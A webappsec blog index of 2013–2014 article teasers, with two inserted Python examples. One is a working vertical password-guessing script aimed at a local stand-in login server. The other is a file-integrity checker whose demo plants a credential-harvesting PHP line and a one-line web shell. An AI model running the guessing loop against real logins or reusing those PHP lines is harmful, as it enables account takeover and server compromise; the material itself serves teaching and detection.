Webappsec->General

Getting a Remote Shell on an Android Device using Metasploit

February 19, 2014 Added by:Dan Dieterle

In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.

Vertical Password Guessing Attacks Part II

February 19, 2014 Added by:Vince Kornacki

Attackers utilize a variety of tools to automate password guessing attacks, including Hydra, Nmap in conjunction with the http-form-brute script, and homegrown scripts. In this post, Vince explains how to conduct Vertical Password Guessing Attacks.
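As an added example (not code from the original post or from Vince's article), here is the vertical pattern itself, one username and a list of candidate passwords, written as the kind of homegrown script the teaser mentions. The login endpoint, its field names, the success marker, the target account and the wordlist are all constructed here so the script runs offline against a local stand-in server:

```python
"""Vertical password guessing against an HTTP login form: ONE account,
many candidate passwords.  Added example, not from the original post.
The endpoint, form field names, success marker, credentials and wordlist
are constructed for this demo; a real target's form is read from its HTML."""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed target: a single valid account behind a POST login form.
VALID_USER = "alice"
VALID_PASS = "Winter2014!"


class LoginHandler(BaseHTTPRequestHandler):
    """Minimal stand-in for a web application's /login endpoint."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        pwd = form.get("password", [""])[0]
        if (user, pwd) == (VALID_USER, VALID_PASS):
            body = b"Welcome, you are logged in"
        else:
            body = b"Invalid username or password"
        self.send_response(200)      # many apps answer 200 either way,
        self.end_headers()           # so success must be judged by the body
        self.wfile.write(body)

    def log_message(self, *args):    # keep the demo quiet
        pass


def start_server():
    """Bind the stand-in to an ephemeral port; return (server, login_url)."""
    srv = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d/login" % srv.server_address[1]


def try_login(url, username, password, success_marker="Welcome"):
    """POST one credential pair; True when the success marker appears."""
    data = urllib.parse.urlencode({"username": username,
                                   "password": password}).encode()
    with urllib.request.urlopen(url, data=data, timeout=5) as resp:
        return success_marker.encode() in resp.read()


def vertical_guess(url, username, wordlist, success_marker="Welcome"):
    """Try every candidate password for a single username.
    Returns (password_found_or_None, attempts_made)."""
    for attempts, candidate in enumerate(wordlist, start=1):
        if try_login(url, username, candidate, success_marker):
            return candidate, attempts
    return None, len(wordlist)


# Constructed wordlist in the style of a short common/seasonal list.
WORDLIST = ["password", "Password1", "letmein", "Summer2013",
            "Winter2014!", "qwerty"]


def demo():
    """Run the attack against the local stand-in and clean up."""
    srv, url = start_server()
    try:
        return vertical_guess(url, VALID_USER, WORDLIST)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

Because the stand-in returns HTTP 200 for both outcomes, success is judged by a marker in the response body rather than the status code; this is the same string you hand to Hydra's http-post-form module as its failure or success condition. Against a real application, account lockout and rate limiting are what make a vertical attack noisy (or turn it into a denial of service against the one account), which is the main reason attackers often prefer the horizontal variant.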

Vulnerability Remediation Tips

January 29, 2014 Added by:Krishna Raja

Discovering vulnerabilities is often the main objective of security teams within large organizations. This is achieved through initiatives such as penetration testing and source code review. But as we know, this is only the first step towards a secure organization.

How SAMM Addresses Outsourced Development

January 28, 2014 Added by:Nima Dezhkam

Despite SAMM’s comprehensive guidelines around establishing an organization-wide security program and integrating security into in-house software development life-cycle, it does not elaborate as much on third-party vendor security and outsourced software development.

The NIST Cyber Security Framework Completely Misses the Mark

January 06, 2014 Added by:Rohit Sethi

The NIST Cyber Security Framework completely lacks any mention of application security. We predict that organizations will likewise adopt the framework with scant attention paid to secure software, which will lull them into a false sense of security.

CMMI for Application Security - 4 High-Impact Implementation Considerations

December 02, 2013 Added by:Rohit Sethi

Ponemon Institute and Security Innovation recently made public the results of a research study they did to get an idea of the state of application security across organizations.

Security Advisor Alliance, a Nonprofit of Elite CISOs Giving Back to the Community

November 12, 2013 Added by:Jason Clark

Security Advisor Alliance is a nonprofit group of top security leaders from the Global 1000 who have come together to donate time each week to help our peers in any area of security as a pro-bono service.

Why Manual Testing is Worth the Extra Buck: Weighing the Pros & Cons

November 12, 2013 Added by:Rohit Sethi

Businesses often ask for guidance on whether they need to do a manual penetration test for a specific application or if automated testing suffices. Here I try to briefly describe some of the advantages and disadvantages of each method and explain our preferred approach.

Security Training Program – Fixed or Customized?

November 07, 2013 Added by:Rohit Sethi

Vishal Asthana takes a closer look at key questions to ask when implementing a software developer security training program.

OWASP Vulnerability Deep Dive: CSRF

October 30, 2013 Added by:Kyle Adams

While OWASP has been around for a long time, and many security experts are aware of their top 10 web vulnerability report, I thought it would be beneficial to elaborate and share a bit more color on each one. This blog series will focus on some of the most common web attack vectors, how they are exploited, some examples, and finally how to prevent the exploit on your own applications.

Can Software Security Requirements Yield Faster Time to Market?

October 17, 2013 Added by:Rohit Sethi

Addressing security requirements while building software is substantially faster than fixing security vulnerabilities later, and since so many organizations end up mandating fixing security defects, preventing those defects up-front yields faster time-to-market.

Leaked Data and Credentials: Cracked Web Applications

September 25, 2013 Added by:InfoSec Institute

Changing the code behind existing web applications is a time-intensive but effective way for hackers to harvest authentication credentials and data. However, you can detect and defend against these types of attacks by using the right mix of file integrity check utilities, antivirus software, and change control policy.
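One of the defenses the teaser names, a file integrity check, as an added example that is not from the original article. The web root, the PHP contents and the tampering (a credential-harvesting line edited into the login routine, a dropped file, a deleted file) are all constructed inline; the baseline stands in for a digest list captured from a known-good deployment and kept off the web server:

```python
"""Detecting tampered web application code with a file-integrity baseline.
Added example, not from the original post.  The web root, the file
contents and the injected credential-harvesting line are constructed here."""
import hashlib
import os
import tempfile


def sha256_file(path):
    """Stream a file through SHA-256 and return its hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map every file under root (relative POSIX path) to its digest."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def compare(baseline, current):
    """Sorted lists of added, removed and modified paths between two scans."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in set(baseline) & set(current)
                           if baseline[p] != current[p]),
    }


def write(root, rel, text):
    """Helper for the constructed web root: write text to root/rel."""
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as f:
        f.write(text)


def demo():
    """Baseline a constructed web root, simulate the tampering the article
    describes, and return what a second scan catches."""
    with tempfile.TemporaryDirectory() as root:
        write(root, "index.php", "<?php include 'inc/auth.php'; ?>\n")
        write(root, "inc/auth.php",
              "<?php\nfunction login($u, $p) { return check_db($u, $p); }\n")
        write(root, "inc/config.php", "<?php $db = 'app'; ?>\n")
        baseline = build_baseline(root)   # as taken from a known-good deploy

        # Attacker edits the login routine to harvest submitted credentials...
        write(root, "inc/auth.php",
              "<?php\nfunction login($u, $p) {\n"
              "  file_put_contents('/tmp/.c', \"$u:$p\\n\", FILE_APPEND);\n"
              "  return check_db($u, $p);\n}\n")
        # ...drops a new script into an upload directory, and deletes a file.
        write(root, "uploads/.cache.php", "<?php system($_GET['c']); ?>\n")
        os.remove(os.path.join(root, "inc", "config.php"))

        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Two caveats a practitioner would add: store the baseline off the host being checked, or sign it, since an attacker who can edit inc/auth.php can also edit a digest list sitting beside it; and take the baseline from the deployment artifact rather than from the running server, or a modification that predates the first scan is enshrined as "known good".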

Why Remediating Assessment Results Might be Harmful to Your Business

September 11, 2013 Added by:Rohit Sethi

Let’s say you’ve just had a pen test or security scan performed on your application. You review the list of findings and get to work on remediation. Apart from obvious shortcomings of any individual single assessment technique, you may also be doing a disservice to meeting your business goals.

The Three Patterns of Software Development for SDLC Security

August 30, 2013 Added by:Rohit Sethi

A one-size-fits-all approach to Software Development Life Cycle (SDLC) security doesn’t work. Practitioners often find that development teams all have different processes – many seem to think they are special snowflakes, rejecting a single SDLC security program.

Cyber Security and Terrorism – See Something, Say Something

August 08, 2013 Added by:Jon Stout

The existing cyber security computing model of the past decade, based on firewalls, anti-viral services, intrusion detection controls, etc., is no longer adequate to help organizations mitigate cyber-security risk.

Cyber Security – Is Offensive Cyber Security Necessary?

July 31, 2013 Added by:Jon Stout

The country is at war and it is a cyber security war. The enemies are many, diverse and competent, and fighting a defensive war is not the best way to win. Cyber security war is like any other war: taking the offensive will improve your chances of success. Like any other war, the cyber security war requires proper planning for success and a total winning strategy. Half-hearted measures will not ...
